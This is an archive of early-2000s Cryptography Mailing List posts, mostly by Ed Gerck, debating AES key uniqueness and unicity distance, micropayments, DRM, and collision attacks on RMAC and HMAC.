> At 2:06 PM +0100 2/17/03, Ralf-Philipp Weinmann wrote:
> >I was wondering whether the following is true:
> >
> >"For each AES-128 plaintext/ciphertext (c,p) pair there
> >  exists exactly one key k such that c=AES-128-Encrypt(p, k)."

The following is always true, for any possible plaintext bit pattern:

"For each AES-128 plaintext/ciphertext (c,p) pair with length
equal to or larger than the unicity distance, there exists exactly
one key k such that c=AES-128-Encrypt(p, k)."

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: AES-128 keys unique for fixed plaintext/ciphertext pair?

2003-02-20 Thread Ed Gerck


Anton Stiglic wrote:

> > The statement was for a plaintext/ciphertext pair, not for a random-bit/
> > random-bit pair. Thus, if we model it terms of a bijection on random-bit
> > pairs, we confuse the different statistics for plaintext, ciphertext, keys
> and
> > we include non-AES bijections.
>
> While your reformulation of the problem is interesting, the initial question
> was regarding plaintext/ciphertext pairs, which usually just refers to the
> pair
> of elements from {0,1}^n, {0,1}^n, where n is the block cipher length.

The previous considerations hinted at but did not consider that a
plaintext/ciphertext pair is not only a random bit pair.

Also, if you consider plaintext to be random bits you're considering a very
special -- and least used -- subset of what plaintext can be. And, it's a
much easier problem to securely encrypt random bits.

The most interesting solution space for the problem, I submit, is in the
encryption of human-readable text such as English, for which the previous
considerations I read in this list do not apply, and provide a false sense of
strength. For this case, the proposition applies -- when qualified for  the
unicity.

Cheers,
Ed Gerck



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: AES-128 keys unique for fixed plaintext/ciphertext pair?

2003-02-18 Thread Ed Gerck

The relevant aspect is that the plaintext and key statistics are the
determining factors as to whether the assertion is correct or not.

In your case, for example, with random keys and ASCII text in English,
one expects that a 128-bit ciphertext segment would NOT satisfy the
requirement for a unique solution -- which is 150 bits of ciphertext.
However, since most cipher systems begin with a "magic number" or
has a message format that begins with the usual "Received", "To:", "From:",
etc., it may be safer to consider a much lower unicity, for example less than
128 bits. In that case, even one block of AES would satisfy the requirements
-- and compression would NOT help.

Of course, keeping the same key while encrypting the next block would
also satisfy the requirements for the resulting 256-bit ciphertext/plaintext
pair to have a unique solution.[*]

Cheers,
Ed Gerck

[*] But note that if the plaintext has the full entropy of ASCII text in English
(as in your example) and compression is used, then the unicity should
increase to above 300 bits of ciphertext. The result is that a two-block
segment of ASCII text in English that is encrypted with the same key would
NOT satisfy the requirement for a unique solution.

Sidney Markowitz wrote:

> Ed Gerck <[EMAIL PROTECTED]> wrote:
>  > For each AES-128 plaintext/ciphertext (c,p) pair with length
> > equal to or larger than the unicity distance, there exists exactly
> > one key k such that c=AES-128-Encrypt(p, k).
>
> Excuse my naivete in the math for this, but is it relevant that the unicity
> distance of ASCII text encrypted with a 128 bit key is about 150 bits
> [Schneier, p 236] and the AES block size is only 128 bits? If you use plain
> ECB mode is the plaintext/ciphertext length in the above statement 128 bits,
> or does the statement imply that you have an arbitrary length (c,p) pair
> using whatever mode, possibly chaining, makes sense for your purpose?
>
>  -- sidney


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: AES-128 keys unique for fixed plaintext/ciphertext pair?

2003-02-18 Thread Ed Gerck

The statement was for a plaintext/ciphertext pair, not for a random-bit/
random-bit pair. Thus, if we model it terms of a bijection on random-bit
pairs, we confuse the different statistics for plaintext, ciphertext, keys and
we include non-AES bijections. Hence, I believe that what we got so far is
a good result... but for a different problem.

In this case, it seems to me that we need to take into account the maximum
possible entropy for the plaintext as well as the entropy of the actual plaintext,
and the entropy of the keys. With these considerations, with the usual
assumption that AES is a random cipher, we can say indeed [*]:

"For each AES-128 plaintext/ciphertext (c,p) pair with length
equal to or larger than the unicity distance, there exists exactly
one key k such that c=AES-128-Encrypt(p, k)."

Cheers,
Ed Gerck

[*] If AES is a random cipher and if the unicity distance "n" calculated
by the usual expression n = H(K)/[|M| - H(M)] for a random cipher,
where the quantities are:

H(K) = entropy of keys effectively used in encryption
|M| = maximum possible entropy for the plaintext
H(M) = entropy of actual message, the given plaintext

is equal to or smaller than the given ciphertext's length, then there
is only possible decipherment of the given ciphertext -- ie, there is
only one key k such that p=AES-128-Decrypt(c, k) and
c=AES-128-Encrypt(p, k).

"Arnold G. Reinhold" wrote:

> At 1:09 PM +1100 2/18/03, Greg Rose wrote:
> >At 02:06 PM 2/17/2003 +0100, Ralf-Philipp Weinmann wrote:
> >>"For each AES-128 plaintext/ciphertext (c,p) pair there
> >>  exists exactly one key k such that c=AES-128-Encrypt(p, k)."
> >
> >I'd be very surprised if this were true, and if it was, it might
> >have bad implications for related key attacks and the use of AES for
> >hashing/MACing.
> >
> >Basically, block encryption with a given key should form a
> >pseudo-random permutation of its inputs, but encryption of a
> >constant input with a varying key is usually expected to behave like
> >a pseudo-random *function* instead.
> >
>
> Here is another way to look at this question. Each 128-bit block
> cipher is a 1-1 function from the set S = {0,1,...,(2**128-1)] on to
> itself, i.e. a bijection. Suppose we have two such functions f and g
> that are randomly selected from the set of all possible bijections
> S-->S (not necessarily ones specified by AES). We can ask what is the
> probability of a collision between f and g, i.e. that there exists
> some value, x, in S such that f(x) = g(x)?  For each possible x in S,
> the probability that f(x) = g(x) is 2**-128. But there are 2**128
> members of S, so we should expect an average of one collision for
> each pair of bijections.
>
> If the ciphers specified by AES behave like randomly selected
> bijections, we should expect one collision for each pair of AES keys
> or 2**256 collisions.  Just one collision violates Mr. Weinmann's
> hypothesis.  So it would be remarkable indeed if there were none.
> Still it would be very interesting to exhibit one.
>
> For ciphers with smaller block sizes (perhaps a 32-bit model of
> Rijndael), counting collisions and matching them against the expected
> distribution might be a useful way to test whether the bijections
> specified by the cipher are randomly distributed among all possible
> bijections.
>
> Arnold Reinhold
>
> -
> The Cryptography Mailing List
> Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Copyright protection, DMCA, DRM and technology

2003-01-19 Thread Ed Gerck

The Supreme Court has rejected a challenge to the Sonny Bono Law.
 http://supremecourtus.gov/oral_arguments/argument_transcripts/01-618.pdf

Let's stir the pot.

Today, law is not the logic of ethics. It is the logic of power.

That said, let's recognize the power of technology that is also at play
here and look at the options that are left after the USSC decision. In
addition to the legal approach of allowing copyright owners to
selectively renounce their seemingly ever-engorgable rights (the Creative
Commons intiative by Lawrence Lessig), one may be able to provide
legal support for technology that -- rather omninously to some -- helps
users become trusted fair-user of copyrighted materials that are so
protected. DRM can be useful  to users.

Why would DRM be useful to users? Because it could reduce the need
for legislation which outright curbs fair-use under the argument that
fair-use is "out of control" in the digital world.

Essentially, I'm making the point that fair-use of copyrighted material
can be technologically enforced and controlled, *notwithstanding*
cooperation (or lack thereof) by the user -- and that is why the user
can be trusted by Jack Valenti.

This argument, in broader terms, could reduce the perception and the
need to have legislation such as the DMCA, that uses the legal system
to protect what technology allegedly cannot (*).

Technology's role is to create tools to make it nearly impossible for
users to profit from an abuse of fair use, which allows laws such as
the DCMA to be questioned under legal arguments  -- for example,
unfair restriction of a buyer's rights.

Cheers,
Ed Gerck

(*) In other words, if it is axiomatic that we do not need much in
terms of legislation to prevent users from doing what is
tecnologically near-to-impossible, then by making available a
technology providing an absence of means for users to
significantly abuse fair use so technologically controled, we
need less in terms of laws providing the control.


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: DeCSS, crypto, law, and economics

2003-01-08 Thread Ed Gerck


Nomen Nescio wrote:

> John S. Denker writes:
> > The main thing the industry really had at stake in
> > this case is the "zone locking" aka "region code"
> > system.
>
> I don't see much evidence for this.  As you go on to admit, multi-region
> players are easily available overseas.  You seem to be claiming that the
> industry's main goal was to protect zone locking when that is already
> being widely defeated.
>
> Isn't it about a million times more probable that the industry's main
> concern was PEOPLE RIPPING DVDS AND TRADING THE FILES?

Well, zone locking helps curb this because it *reduces* the market for each
copy. The finer the zone locking resolution, the more effort an attacker needs
to make in order to be able to trade more copies.

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Micropayments, redux

2002-12-16 Thread Ed Gerck
David:

I'm happy you don't see any problems and I don't see
them either -- within the constraints I mentioned. But
if you work outside those #1, #2 and #3 constraints
you would have problems, which is something you may
want to look further into.

For example, in reply to my constraint  #2, you say:

 "This is expected to be roughly counterbalanced by the
 number of unlucky users who quite (sic) "while behind"."

but these events occur under different models. If there
is no prepayment (which is my point #2) then many users
can quit after few transactions and there is no statistical
barrier to limit this behavior. On the other hand, the number
of users who quit after being unlucky is a matter of statistics.
These are apples and speedboats. You ned to have an
implementation barrier to handle #2.

Cheers,
Ed Gerck


David Wagner wrote:

> Ed Gerck  wrote:
> >1. If there is no limit, then the well-known doubling
> >strategy would allow the user to, eventually, make the
> >bank lose -- the user getting a net profit.
>
> I think you misunderstand the nature of the martingale strategy.
> It's not a good way to win in Las Vegas, and it's not a good way to
> win here, either.  Anyway, even if it were a problem, there would
> be lots of ways to prevent this strategy in a digital cash system.
>
> >2. If there is no prepaid amount, lucky users could quit
> >"while ahead" -- which would hurt the bank since those
> >users would be out of the pool to be charged, but they
> >have used the service.
>
> No problem.  This is expected to be roughly counterbalanced by the
> number of unlucky users who quite "while behind".
>
> >Another question, which answer I guess is more
> >market-related than crypto-related, is whether banks
> >will accept the liability of a losing streak ...for them.
> >[...] The problem here
> >is that, all things being fair, the system depends on
> >unlimited time to average things out.
>
> No, it doesn't.  It doesn't take unlimited time for lottery-based
> payment schemes to average out; finite time suffices to get the
> schemes to average out to within any desired error ratio.  The
> expected risk-to-revenue ratio goes down like 1/sqrt(N), where N
> is the number of transactions.  Consequently, it's easy for banks
> to ensure that the system will adequately protect their interests.
>
> And everything is eminently predictable.  Suppose the banks expect
> to do a 10^8 transactions, each worth $0.01.  Then their expected
> intake is $1 million, plus or minus maybe $1000 or so (the latter
> depends slightly on the exact parameter choices).  Any rational
> bank ought to be willing to absorb a few thousand in plus or minus,
> at this level of business.
>
> In short: I think your list of "problems" in the approach are not
> actually problematic in practice.
>
> -
> The Cryptography Mailing List
> Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Micropayments, redux

2002-12-16 Thread Ed Gerck

What follows below is from my dialogue with Ron
earlier this year, when the design was still being
worked out as he told me, when he kindly answered
some of my remarks --  which I also report below.

This is a very interesting proposal that creates a
large aggregate value worth billing for (in terms
of all operational and overhead costs), but which
large value the user will pay *on average*.

The user has a limit, and one idea is that the user
would pre-pay it (which may raise questions about
creating a barrier against spontaneous buying but
could be presented as an authorized credit limit,
I think) and then spend the limit in thousands (or more)
of "peppercorn-worth" (i.e., very small value -- maybe
cents or fractions of cents)  transactions that would be
paid only *on average*.  That is, most of the peppercorn
transactions would go *unpaid* and *unprocessed* -- thus,
with near zero overhead. However, some transactions would
hit the "jackpot" and be charged with a multiplicative
factor that -- on average -- pays for all unpaid transactions
and overhead.

Thus, because of the limit and the prepay, this can be seen
as a game that has no possible underpaying strategy
for the user, and the bank would be happy to let the
user play it as often as he likes -- with the following
caveats:

1. If there is no limit, then the well-known doubling
strategy would allow the user to, eventually, make the
bank lose -- the user getting a net profit.

2. If there is no prepaid amount, lucky users could quit
"while ahead" -- which would hurt the bank since those
users would be out of the pool to be charged, but they
have used the service.

3. The game is fair -- the bank will not "weigh the
wheel" (and hurt the users) and no one can compromise
the methods used by the bank (and hurt the bank).

Of course, if the wheel is not exactly balanced,
or if the house takes a cut in some other way,
then the user or the bank are losing ground at each
step.

Another question, which answer I guess is more
market-related than crypto-related, is whether banks
will accept the liability of a losing streak ...for them.
Likewise, users may lack motivation to continue using
the system if they have a losing streak (i.e., if they run
out of their prepaid amount sooner than what they and
the bank expects, and pre-pay again, and again run out
of money sooner than expected, and again until they
give up to be on the losing side). The problem here
is that, all things being fair, the system depends on
unlimited time to average things out.  This can be
compensated, I'd expect, by adequate human monitoring
and insurance. As always, it is not only the math that makes
things work -- even though it's also the math.

All things considered, though, as I said above this is a
very interesting proposal because it does reduce
processing and overhead costs to near zero for a large
number of transactions. I'd refrain from saying "zero"
because there should be some auditing involved for
all transactions.

Cheers,
Ed Gerck



Udhay Shankar N wrote:

> Ron Rivest is involved, too. Anybody got more info?
>
> http://www.peppercoin.com/peppercoin_is.html
>
> Peppercoin is a new approach to an old challenge: how to make small value
> transactions—micropayments—feasible. There is a whole world of digital
> content gathering dust because owners cannot find a profitable way to get
> it into the hands of paying customers.
>
> Merchants can profitably sell content or services at very low price points,
> which would be unprofitable with traditional payment methods.
> Consumers can purchase small-value items easily; PepperCoins are "digital
> pocket change" for music, games, and other downloads.
>
> Through a cryptographically secure process of sampling digital payments,
> Peppercoin reduces the volume of transactions processed by a third-party
> payment processor or financial institution. Peppercoin utilizes the most
> robust and secure digital encryption technologies, based on RSA digital
> signatures, to process and protect payments.
>
> Peppercoin's innovative technology is protected by worldwide patent
> applications.
>
> --
> ((Udhay Shankar N)) ((udhay @ pobox.com)) ((www.digeratus.com))
>
> -
> The Cryptography Mailing List
> Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Secure Electronic and Internet Voting

2002-11-19 Thread Ed Gerck
List:

I want to spread the word about a newly published book
by Kluwer, where I have a chapter explaining Safevote's
technology and why we can do in voting (a much harder
problem) what e-commerce has not yet accomplished (it's
left as an exercise for the reader to figure out why 
e-commerce has not yet done it; hints by email if you 
wish). This book serves as a good introduction to other 
systems and some nay-sayers.  The book's URL is
http://www.wkap.nl/prod/b/1-4020-7301-1

With the US poised to test Internet voting in 2004/6, 
this book may provide useful, timely points for the 
discussion. We can't audit electrons but we can certainly
audit their pattern.

Cheers,
Ed Gerck

-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: more snake oil? [WAS: New uncrackable(?) encryption technique]

2002-10-25 Thread Ed Gerck


bear wrote:

> The implication is that they have a "hard problem" in their
> bioscience application, which they have recast as a cipher.

Their problem is not hard -- it is just either slow to converge for
some methods or not simply uniquely determined (*). They consider
the cases that are not uniquely determined, which is equivalent to the
following problem:

   given Y solve for X in Y = X mod 11

(and I mean 11 as a good number for their problem space),
which has many answers. Indeed, the number of answers (‘keys’)
that fit the equation is infinite. Since they know the only "X" that they
consider (quite arbitrarily) to be the "right" answer, they say that
you can't guess it -- hence it is unbreakable in their view. However,
their search space is very small and all functional exponential forms
can be tried in parallel with much better algorithms than what they
seem to use (*). This is not better than short passwords, so that one
probably does not even need to break in and snatch the file holding
the keys to the kingdom -- the coefficients that were used.

(*) For an example, see the Prony method comment and reference in  
http://www-ee.stanford.edu/~siegman/Beams_and_resonators_2.pdf

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Why is RMAC resistant to birthday attacks?

2002-10-24 Thread Ed Gerck


David Wagner wrote:

> Ed Gerck  wrote:
> >Wei Dai wrote:
> >> No matter how good the MAC design is, it's internal collision probability
> >> is bounded by the inverse of the size of its internal state space.
> >
> >Actually, for any two (different) messages the internal collision probability
> >is bounded by the inverse of the SQUARE of the size of the internal state space.
>
> No, I think Wei Dai had it right.  SHA1-HMAC has a 160-bit internal state.
> If you fix two messages, the probability that they give an internal collision
> is 1/2^160.
>
> Maybe you are thinking of the birthday paradox.  If you have 2^80 messages,
> then there is a good probability that some pair of them collide.  But this
> is the square root of the size of the internal state space.  And again, Wei
> Dai's point holds: the only way to reduce the likelihood of internal collisions
> is to increase the internal state space.
>
> In short, I think Wei Dai has it 100% correct.

Thanks again. I should have had some coffee at that time...I meant SQUARE ROOT.

As to the point you say is in question: "the only way to reduce the likelihood of 
internal
collisions is to increase the internal state space." -- this is clearly true but is 
NOT what
is in discussion here. The point is whether the only way to reduce the likelihood of
attacks based on MAC collisions is to increase the internal state space.  These
statements are not equivalent.

> >Not really. You can prevent internal collision attacks, for example, by using
> >the envelope method (e.g., HMAC) to set up the MAC message.
>
> This is not accurate.  The original van Oorschot and Preneel paper
> describes an internal collision attack on MD5 with the envelope method.
> Please note also that HMAC is different from the envelope method, but
> there are internal collision attacks on HMAC as well.  Once again, I
> think Wei Dai was 100% correct here, as well.

However, it was possible to reduce the likelihood of attacks based on MAC
collisions is to increase the internal state space.   This is what I was trying to
explain. More below...

> You might want to consider reading some of the literature on internal
> collision attacks before continuing this discussion too much further.
> Maybe all will become clear then.

It's always good to read more, and learn more. But what I'm saying is
written in many such papers, including some that are written for
a general audience:

---
To attack MD5 [for example], attackers can choose any set of messages and
work on these  offline on a dedicated computing facility to find a collision.
Because attackers know the hash algorithm and the default IV, attackers can
generate the hash code for each of the messages that attackers generate. However,
when attacking HMAC, attackers cannot generate message/code pairs offline
because attackers do not know K. Therefore, attackers must observe a
sequence of messages generated by HMAC under the same key and perform
the attack on these known messages. For a hash code length of 128 bits, this
requires 264 observed blocks (273 bits) generated using the same key.
--in Dr. Dobbs, April 1999.

The point is clear: WITHOUT increasing the internal search space of MD5,
MD5 is used in a way that vastly reduces the likelihood of attacks based on
MAC collisions.

Cheers,
Ed Gerck








-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Why is RMAC resistant to birthday attacks?

2002-10-24 Thread Ed Gerck
... pls read this message with the edits below... 
missing "^" in exp and the word "WITHOUT"...still no coffee...

David Wagner wrote:

> Ed Gerck  wrote:
> >Wei Dai wrote:
> >> No matter how good the MAC design is, it's internal collision probability
> >> is bounded by the inverse of the size of its internal state space.
> >
> >Actually, for any two (different) messages the internal collision probability
> >is bounded by the inverse of the SQUARE of the size of the internal state space.
>
> No, I think Wei Dai had it right.  SHA1-HMAC has a 160-bit internal state.
> If you fix two messages, the probability that they give an internal collision
> is 1/2^160.
>
> Maybe you are thinking of the birthday paradox.  If you have 2^80 messages,
> then there is a good probability that some pair of them collide.  But this
> is the square root of the size of the internal state space.  And again, Wei
> Dai's point holds: the only way to reduce the likelihood of internal collisions
> is to increase the internal state space.
>
> In short, I think Wei Dai has it 100% correct.

Thanks again. I should have had some coffee at that time...I meant SQUARE ROOT.

As to the point you say is in question: "the only way to reduce the likelihood of 
internal
collisions is to increase the internal state space." -- this is clearly true but is 
NOT what
is in discussion here. The point is whether the only way to reduce the likelihood of
attacks based on MAC collisions is to increase the internal state space.  These
statements are not equivalent.

> >Not really. You can prevent internal collision attacks, for example, by using
> >the envelope method (e.g., HMAC) to set up the MAC message.
>
> This is not accurate.  The original van Oorschot and Preneel paper
> describes an internal collision attack on MD5 with the envelope method.
> Please note also that HMAC is different from the envelope method, but
> there are internal collision attacks on HMAC as well.  Once again, I
> think Wei Dai was 100% correct here, as well.

However, it was possible to reduce the likelihood of attacks based on MAC
collisions WITHOUT increasing the internal state space.   This is what I was 
trying to explain. More below...

> You might want to consider reading some of the literature on internal
> collision attacks before continuing this discussion too much further.
> Maybe all will become clear then.

It's always good to read more, and learn more. But what I'm saying is
written in many such papers, including some that are written for
a general audience:

---
To attack MD5 [for example], attackers can choose any set of messages and
work on these  offline on a dedicated computing facility to find a collision.
Because attackers know the hash algorithm and the default IV, attackers can
generate the hash code for each of the messages that attackers generate. However,
when attacking HMAC, attackers cannot generate message/code pairs offline
because attackers do not know K. Therefore, attackers must observe a
sequence of messages generated by HMAC under the same key and perform
the attack on these known messages. For a hash code length of 128 bits, this
requires 2^64 observed blocks (2^73 bits) generated using the same key.
--in Dr. Dobbs, April 1999.

The point is clear: WITHOUT increasing the internal search space of MD5,
MD5 is used in a way that vastly reduces the likelihood of attacks based on
MAC collisions.

Cheers,
Ed Gerck

-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



collision resistance -- Re: Why is RMAC resistant to birthday attacks?

2002-10-24 Thread Ed Gerck
There seems to be a question about whether:

1. the internal collision probability of  a hash function is bounded by the
inverse of the size of its internal state space, or

2. the internal collision probability of a hash function is bounded by the
inverse of the square root of size of its internal state space.

If we assume that the hash function is a good one and thus its hash space
is uniformely distributed (a good hash function is a good PRF), then we can
say:

For a hash function with an internal state space of size S, if we take n
messages x1, x2, ...xn, the probability P that there are i and j such that
hash(xi) = hash(xj), for xi <> xj, is

P = 1 - (S!/( (S^n)*(S - n)!)

which can be approximated by

P ~ 1 - e^(-n*(n - 1)/2^(S + 1) ).

We see above a n^2 factor which will translate into a factor with sqrt(2^S)
when we solve for n. For example, if we ask how many messages N we
need in order to have P > 0.5, we solve for n and the calculation gives:

N ~ sqrt( 2*ln(2)*2^S ).

Thus, if we consider just two messages, affirmation #1 holds, because
P reduces to 1/S. If we consider n > 2 messages, affirmation #2 holds (the
birthday paradox).

Cheers,
Ed Gerck






-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: collision resistance -- Re: Why is RMAC resistant to birthday attacks?

2002-10-24 Thread Ed Gerck


David Wagner wrote:

> > There seems to be a question about whether:
> >
> > 1. the internal collision probability of  a hash function is bounded by the
> > inverse of the size of its internal state space, or
> >
> > 2. the internal collision probability of a hash function is bounded by the
> > inverse of the square root of size of its internal state space.
> [...]
> > Thus, if we consider just two messages, affirmation #1 holds, because
> > P reduces to 1/S. If we consider n > 2 messages, affirmation #2 holds (the
> > birthday paradox).
>
> Umm, that's basically what I said in my previous message to the
> cryptography mailing list.  But my terminology was better chosen.
> In case 2, calling this "the internal collision probability" is
> very misleading; there is no event whose probability is the inverse
> of the square root of the size of the internal state space.

The event is finding 1 collision out of n messages.

> Again, this is nothing new.  This is all very basic stuff, covered
> in any good crypto textbook: e.g., _The Handbook of Applied Cryptography_.
> You might want to take the time to read their chapters on hash functions
> and message authentication before continuing this discussion.

;-) I never said it was new. But since you apparently sided with #1 and I
sided with #2, I was commenting that -- for once -- we both seem to be
right. BTW, the first time I read those chapters was in '97 and I still go
back to them when I need to brush up on something. The HAC is a great
book and, as you probably know, it's 100% available online too.

Cheers,
Ed Gerck




-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Why is RMAC resistant to birthday attacks?

2002-10-24 Thread Ed Gerck


David Wagner wrote:

> Ed Gerck  wrote:
> >(A required property of MACs is providing a uniform distribution of values for a
> >change in any of the input bits, which makes the above sequence extremely
> >improbable)
>
> Not so.  This is not a required property for a MAC.
> (Not all MACs must be PRFs.)

Thanks. I should have written "a usually required property". In general,
to have a good MAC, we require a good PRF.

Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Why is RMAC resistant to birthday attacks?

2002-10-23 Thread Ed Gerck


Wei Dai wrote:

> On Wed, Oct 23, 2002 at 05:01:52PM -0700, Ed Gerck wrote:
> > I think that there is a third (and dominating) possibility: this is a very bad MAC.
> > (A required property of MACs is providing a uniform distribution of values for a
> > change in any of the input bits, which makes the above sequence extremely
> > improbable)
>
> No matter how good the MAC design is, it's internal collision probability
> is bounded by the inverse of the size of its internal state space.

Actually, for any two (different) messages the internal collision probability
is bounded by the inverse of the SQUARE of the size of the internal state space.

> The
> point is that you can't prevent an attacker from learning about an
> internal collision, once it happens, by hiding some of the state from the
> MAC tag.

You seem to say that even if some of the internal state is hidden from the MAC
tag, once an attacker sees a MAC collision he can deduct that an internal collision
occurred as well. If so, this is incorrect.

> The only way to prevent internal collision attacks is to
> decrease the internal collision probability, which unless the MAC is badly
> designed to begin with, requires increasing the size of the internal state
> space.

Not really. You can prevent internal collision attacks, for example, by using
the envelope method (e.g., HMAC) to set up the MAC message. In such a
case, having a previous message M the attacker can discover (e.g., by calculating
over a large number of messages) another message M* such that hash(M) =
hash(M*) -- i.e., an internal collision. However, finding out this internal collision
CANNOT be leveraged into subverting the receiving party in accepting M* as
genuine.

Thus, without increasing the size of the internal search space AND without
preventing internal collisions by any other way, it is possible to prevent an
attack that would use an internal collision.

> I'm sorry but I don't know how to explain this any better. I've tried to
> do it three different ways, and I hope someone else will do a better job
> if you still are not convinced.
>
> > BTW, references for using MAC subsets OR fixed-length messages to prevent
> > guessing the internal chaining value should be straight forward to find in the
> > literature.
>
> Those techniques may be useful when the attack requires knowing the
> internal state, but they are not useful when the attack only requires
> detecting collisions in the internal state. The literature you mention
> must be about the former case.

You seem to imply that it is harder to defend against an attacker who knows
less (only detects collisions), than against an attacker who knows more (also
knows the internal state).  The reverse is true, by logic.

Also, please note that those techniques, and also the envelope method, are indeed
useful to prevent attacks when an attacker can detect collisions in the internal
state -- as my example above exemplifies.

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Why is RMAC resistant to birthday attacks?

2002-10-23 Thread Ed Gerck

Wei Dai wrote:

> ...
> suppose that an attacker finds two messages X and Y such that MAC(X|0) =
> MAC(Y|0), MAC(X|1) = MAC(Y|1), up to MAC(X|n) = MAC(Y|n). There are two
> possibilities: either there is a collision in the internal state after
> processing X and Y, or the internal states are different and all those MAC
> tags match up through seperate coincidences.
> ...

I think that there is a third (and dominating) possibility: this is a very bad MAC.
(A required property of MACs is providing a uniform distribution of values for a
change in any of the input bits, which makes the above sequence extremely
improbable)

BTW, references for using MAC subsets OR fixed-length messages to prevent
guessing the internal chaining value should be straight forward to find in the
literature.

Cheers,
Ed Gerck



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Why is RMAC resistant to birthday attacks?

2002-10-22 Thread Ed Gerck


Sidney Markowitz wrote:

> Ed Gerck" <[EMAIL PROTECTED]> said:
> > That's is not the reason it was devised. The reason is to prevent a birthday
> > attack for 2^(t/2) tries on a MAC using a t-bit key. Needless to say, it also makes
> > harder to try a brute force attack.
>
> RMAC was devised for the reason I stated, as it says in the last quote from
> the paper above. The salt is there to make the cost of the extension forgery
> attack more expensive because the birthday surprise shows that just the number
> of bits in the cipher block may not make it expensive enough without a salt.
> The key size is not relevant to the "birthday attack" (actually extension
> forgery attack) as shown in the table where the work factor expressed as a
> function of the block length and the salt length, not the key size.

A minor nit, but sometimes looking into why things were devised is helpful.
What I explained can be found in
http://csrc.nist.gov/encryption/modes/workshop2/report.pdf
and especially useful is the segment:

The RMAC algorithm was a refinement of the DMAC algorithm in which a random bit
string was exclusive-ORed into the second key and then appended to the resulting MAC
to form the tag. The birthday paradox in principle was no longer relevant, for, say, 
the
AES with 128 bit keys, because the tag would be doubled to 256 bits. Joux presented his
underlying security model and the properties that he had proven for RMAC: the number
of queries that bounded the chance of a forgery was relatively close to the number of 
128
bit keys.

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Why is RMAC resistant to birthday attacks?

2002-10-22 Thread Ed Gerck


Sidney Markowitz wrote:

> [EMAIL PROTECTED]
> > I want to understand the assumptions (threat models) behind the
> > work factor estimates. Does the above look right?
>
> I just realized something about the salt in the RMAC algorithm, although it
> may have been obvious to everyone else:
>
> RMAC is equivalent to a HMAC hash-based MAC algorithm, but using a block
> cipher.

No -- these are all independent things. One can build an RMAC wih SHA-1.
An RMAC does not have to use an HMAC scheme. One can also have an
HMAC hash-based MAC algorithm using a block cipher, that is not an RMAC.

> The paper states that it is for use instead of HMAC iin circumstances
> where for some reason it is easier to use a block cipher than a cryptographic
> hash.

That's is not the reason it was devised. The reason is to prevent a birthday attack
for 2^(t/2) tries on a MAC using a t-bit key. Needless to say, it also makes harder
to try a brute force attack.

Cheers,
Ed Gerck





-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Why is RMAC resistant to birthday attacks?

2002-10-22 Thread Ed Gerck


Wei Dai wrote:

> On Tue, Oct 22, 2002 at 12:31:47PM -0700, Ed Gerck wrote:
> > My earlier comment to bear applies here as well -- this attack can be avoided
> > if only a subset of the MAC tag  is used
>
> I can't seem to find your earlier comment. It probably hasn't gone through
> the mailing list yet.
>
> I don't see how the attack is avoided if only a substring of the MAC tag
> is used. (I assume you mean substring above instead of subset.)

Yes, subset -- not  a string with less N characters at the end. For example,
you can calculate the P subset as MAC mod P, for P smaller than
2^(bits in the MAC tag).

> The
> attacker just needs to find messages x and y such that the truncated MAC
> tags of x|0, x|1, ..., x|n, matches those of y|0, y|1, ..., y|n, and this
> will tell him that there is an internal collision between x and y.

No. The attacker gets A and B, and sees that A = B. This does not mean
that a=b in  A = a mod P and B = b mod P.  The internal states are possibly
different even though the values seen by the attacker are the same.

> n only
> has to be large enough so that the total length of the truncated MAC tags
> is greater than the size of the internal state of the MAC.
>
> > OR if the message to be hashed has
> > a fixed length defined by the issuer. Only one of these conditions are needed.
>
> No I don't think that works either. The attacker can try to find messages
> x and y such that MAC(x|0^n) = MAC(y|0^n) (where 0^n denotes enough zeros
> to pad the messages up to the fixed length).  Then there is a good
> chance that the internal collision occured before the 0's and so
> MAC(x|z)  = MAC(y|z) for all z of length n.

Why do you think there is a "good chance"?

Note that all messages for which you can get a MAC have some fixed message
length M. The attacker cannot leverage a MAC value to calculate the state of
a M+1 length message -- exactly because this is prevented by making all messages
have length M.

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Why is RMAC resistant to birthday attacks?

2002-10-22 Thread Ed Gerck


[EMAIL PROTECTED] wrote:

